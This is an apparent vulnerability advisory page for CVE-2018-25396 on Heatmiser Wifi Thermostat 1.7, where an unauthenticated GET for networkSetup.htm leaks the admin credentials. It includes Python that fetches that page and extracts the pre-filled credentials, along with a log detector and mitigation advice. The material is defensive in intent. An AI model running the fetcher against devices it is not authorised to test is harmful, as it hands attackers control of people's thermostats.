Description
Heatmiser Wifi Thermostat 1.7 contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve administrative credentials by accessing the networkSetup.htm page. Attackers can request the networkSetup.htm endpoint and extract plaintext username and password values from HTML form fields to gain administrative access to the thermostat.
Published: 2026-05-29
Score: 8.7 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Heatmiser Wifi Thermostat firmware version 1.7 contains a credential disclosure flaw (CWE-256, plaintext storage of a password) that lets an unauthenticated attacker retrieve the administrator username and password by requesting the networkSetup.htm page. The device writes its stored credentials into the HTML form fields of that page, so anyone who can reach the web interface can read them from the page source without logging in. With the credentials in hand the attacker has full administrative control of the thermostat. Note that both CVSS vectors recorded in the history below score only confidentiality (C:H, I:N): the direct effect of the flaw is disclosure, and the loss of integrity follows from using the disclosed credentials rather than from the flaw itself.

Affected Systems

The affected product is the Heatmiser Wifi Thermostat running firmware 1.7. No other vendors, products, or firmware versions are listed as impacted.

Risk and Exploitability

The flaw carries a CVSS v4.0 base score of 8.7 (High); the CVSS v3.1 vector scores it 7.5. Both vectors record a network attack vector, low complexity, no privileges and no user interaction. EPSS information is unavailable, so the probability of exploitation cannot be quantified, and the vulnerability is not listed in the CISA KEV catalog; the SSVC assessment in the history below does, however, record a public proof of concept and rate the flaw automatable, so scanning for exposed devices needs no skill. Exploitation consists of a single unauthenticated HTTP GET for networkSetup.htm on the thermostat's web interface; the only precondition is network reachability of that interface, which is why internet-exposed units are the ones at greatest risk.

Generated by OpenCVE AI on May 29, 2026 at 17:41 UTC.
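A reproducible way to test a device for this flaw is to fetch the page exactly as the advisory describes (one unauthenticated GET) and inspect the returned form for pre-populated credential fields. The Python below is an added example written for this page, not code from OpenCVE, VulnCheck or Heatmiser; the sample HTML is constructed to resemble a configuration form, and the field names (username, password) and the heuristics used to recognise them are assumptions, since the real device's markup is not shown here.

```python
"""Check a networkSetup.htm response for pre-populated credential fields.

Added example for this page; not code from OpenCVE, VulnCheck or Heatmiser.
The sample HTML is CONSTRUCTED, and the field names and matching heuristics
are assumptions: the real device's markup is not shown on the page.
"""
from html.parser import HTMLParser
import urllib.request

# Substrings that suggest an <input> carries a credential (assumption).
USERNAME_HINTS = ("user", "login")
PASSWORD_HINTS = ("pass", "pwd")


class InputCollector(HTMLParser):
    """Record name, type and value of every <input> element in the page."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        attr = {k.lower(): (v or "") for k, v in attrs}
        self.inputs.append({
            "name": attr.get("name", ""),
            "type": attr.get("type", "text").lower(),
            "value": attr.get("value", ""),
        })


def find_prefilled_credentials(html):
    """Return [(field_name, value)] for credential-looking inputs that arrive
    with a non-empty value.

    A type="password" input with a value attribute is still plaintext in the
    page source; the browser only masks it on screen. Any such field, or a
    username-like field, that the server pre-fills for an unauthenticated
    client is the disclosure described in the advisory.
    """
    parser = InputCollector()
    parser.feed(html)
    leaks = []
    for field in parser.inputs:
        name = field["name"].lower()
        is_password = field["type"] == "password" or any(h in name for h in PASSWORD_HINTS)
        is_username = any(h in name for h in USERNAME_HINTS)
        if (is_password or is_username) and field["value"]:
            leaks.append((field["name"], field["value"]))
    return leaks


def check_device(host, timeout=5):
    """Fetch http://<host>/networkSetup.htm with no credentials, as the
    advisory describes, and report any leaked fields. Network call; not
    exercised offline."""
    url = f"http://{host}/networkSetup.htm"
    req = urllib.request.Request(url, headers={"User-Agent": "cred-disclosure-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return find_prefilled_credentials(body)


# CONSTRUCTED responses: what a vulnerable and a fixed page might look like.
VULNERABLE_PAGE = """<html><body><form action="networkSetup.htm" method="post">
<input type="text" name="ssid" value="HomeNet">
<input type="text" name="hostname" value="thermostat">
<input type="text" name="username" value="admin">
<input type="password" name="password" value="hunter2">
<input type="submit" value="Save">
</form></body></html>"""

FIXED_PAGE = """<html><body><form action="networkSetup.htm" method="post">
<input type="text" name="ssid" value="HomeNet">
<input type="text" name="username" value="">
<input type="password" name="password">
<input type="submit" value="Save">
</form></body></html>"""


if __name__ == "__main__":
    for label, page in (("vulnerable", VULNERABLE_PAGE), ("fixed", FIXED_PAGE)):
        print(label, find_prefilled_credentials(page))
```

Run check_device("<thermostat-ip>") only against devices you own or are authorised to test; the parser alone is enough to vet a saved response or to confirm that a firmware update actually stopped the page from echoing the secret rather than merely hiding the field.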

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply a firmware update that stops networkSetup.htm from emitting the stored credentials, once the vendor releases one; none is listed at the time of writing.
  • Until then, restrict access to the thermostat's web interface at the network layer (VLAN segmentation or firewall rules) so that only trusted management hosts can reach it, and never expose it to the internet.
  • Rotating the administrator password on its own does not mitigate this flaw: the new password is disclosed by the same page. Rotate it only after the device is isolated or patched, treat the current credential as compromised, and change it anywhere it was reused.

Generated by OpenCVE AI on May 29, 2026 at 17:41 UTC.
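Because rotating the password does not help while the page is reachable, the useful controls are network restriction and detection of reads of the page. The following Python is an added example, not from OpenCVE or the vendor; it assumes, which the page does not state, that requests toward the thermostat are visible in an access-log-style feed (for instance from a reverse proxy or network sensor placed in front of the device), and the log lines are constructed. It flags any request for networkSetup.htm from outside a management allowlist, distinguishing reads that would have returned the credentials from attempts to change the configuration.

```python
"""Flag access to networkSetup.htm from outside a management allowlist.

Added example for this page; not code from OpenCVE or Heatmiser. It assumes
(the page does not say) that requests to the thermostat are visible in an
access-log-style feed, e.g. from a reverse proxy or network sensor in front
of the device. The log lines are CONSTRUCTED.
"""
import ipaddress
import re

# Common-log-style line: client, timestamp, request line, status (assumed format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)

# Compared case-insensitively: small embedded servers often ignore path case.
TARGET_PATH = "/networksetup.htm"

SAMPLE_LOG = """\
192.168.1.10 - - [29/May/2026:18:00:01 +0000] "GET /index.htm HTTP/1.1" 200 512
192.168.1.10 - - [29/May/2026:18:00:05 +0000] "GET /networkSetup.htm HTTP/1.1" 200 1843
203.0.113.77 - - [29/May/2026:18:02:17 +0000] "GET /networkSetup.htm HTTP/1.1" 200 1843
203.0.113.77 - - [29/May/2026:18:02:18 +0000] "GET /NETWORKSETUP.HTM?x=1 HTTP/1.1" 200 1843
10.0.0.5 - - [29/May/2026:18:03:00 +0000] "POST /networkSetup.htm HTTP/1.1" 302 0
this line is malformed and must be skipped, not crash the detector
"""


def detect_credential_page_access(log_text, allowed_networks):
    """Return one finding per request for networkSetup.htm whose client is
    outside allowed_networks (CIDR strings).

    kind == "credential_read": a GET answered 200, meaning the page, and on an
    unpatched device the stored credentials, was served to an untrusted
    client. Any other method/status is reported as a "config_change" attempt.
    """
    nets = [ipaddress.ip_network(n, strict=False) for n in allowed_networks]
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # malformed or unrelated line
        path = m["path"].split("?", 1)[0].lower()
        if path != TARGET_PATH:
            continue
        try:
            src = ipaddress.ip_address(m["src"])
        except ValueError:
            continue
        if any(src in net for net in nets):
            continue  # management host; expected traffic
        read = m["method"] == "GET" and m["status"] == "200"
        findings.append({
            "src": str(src),
            "ts": m["ts"],
            "kind": "credential_read" if read else "config_change",
            "request": f'{m["method"]} {m["path"]}',
        })
    return findings


if __name__ == "__main__":
    for finding in detect_credential_page_access(SAMPLE_LOG, ["192.168.1.0/24"]):
        print(finding)
```

A credential_read finding from an untrusted source on an unpatched device should be treated as a confirmed disclosure of the administrator password, not merely a scan; the same rule with an empty allowlist is also a quick way to prove, after segmentation, that nothing outside the management network can still reach the page.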

Tracking


Advisories

No advisories yet.

History

Fri, 29 May 2026 20:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 29 May 2026 18:00:00 +0000

Type Values Removed Values Added
First Time appeared Heatmiser
Heatmiser heatmiser Wifi Thermostat
Vendors & Products Heatmiser
Heatmiser heatmiser Wifi Thermostat

Fri, 29 May 2026 16:15:00 +0000

Type Values Removed Values Added
Description Heatmiser Wifi Thermostat 1.7 contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve administrative credentials by accessing the networkSetup.htm page. Attackers can request the networkSetup.htm endpoint and extract plaintext username and password values from HTML form fields to gain administrative access to the thermostat.
Title Heatmiser Wifi Thermostat 1.7 Credential Disclosure via networkSetup.htm
Weaknesses CWE-256
References
Metrics cvssV3_1

{'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}

cvssV4_0

{'score': 8.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}


Subscriptions

Heatmiser Heatmiser Wifi Thermostat
MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-29T19:26:56.914Z

Reserved: 2026-05-29T11:39:31.982Z

Link: CVE-2018-25396

Vulnrichment

Updated: 2026-05-29T19:26:42.591Z

NVD

Status : Received

Published: 2026-05-29T16:16:19.107

Modified: 2026-05-29T16:16:19.107

Link: CVE-2018-25396

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-29T17:45:04Z

Weaknesses